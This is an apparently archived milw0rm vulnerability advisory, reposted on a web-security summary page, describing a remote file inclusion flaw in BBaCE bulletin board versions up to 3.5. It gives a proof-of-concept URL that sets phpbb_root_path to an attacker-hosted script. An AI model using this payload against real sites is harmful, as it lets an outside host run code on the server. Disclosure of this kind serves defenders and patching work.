Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

digishop v 4.0.0 Xss Vuln.

Dayfox Blog v2.0 Remote file include

Pebble 2.0.0 RC[1,2] XSS vulnerability

From:	MILW0RM <submit_(at)_milw0rm.com>
Date:	03.10.2006
Subject:	BBaCE <= 3.5 (includes/functions.php) Remote File Include Vulnerability

_________________________________________________________________________


          /      \
       \  \  ,,  /  /
        '-.`\()/`.-'
       .--_'(  )'_--.
      / /` /`""`\ `\ \           * SpiderZ Hacking Security *
       |  |  ><  |  |
       \  \      /  /
           '.__.'


# Author: SpiderZ
# BBaCE Remote File Inclusion Vulnerability
# For: BBaCE v3 ( Bulletin Board Ace )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
-------------------------------------------------------------------------
Download: http://bbace.blogspot.com/2005/09/downloads.html
Download 2: http://www.phpbbhacks.com/download/3062
-------------------------------------------------------------------------
_________________________________________________________________________




http://site.com/[path]/includes/functions.php?phpbb_root_path=http:
//[Evil_script]

# milw0rm.com [2006-10-02]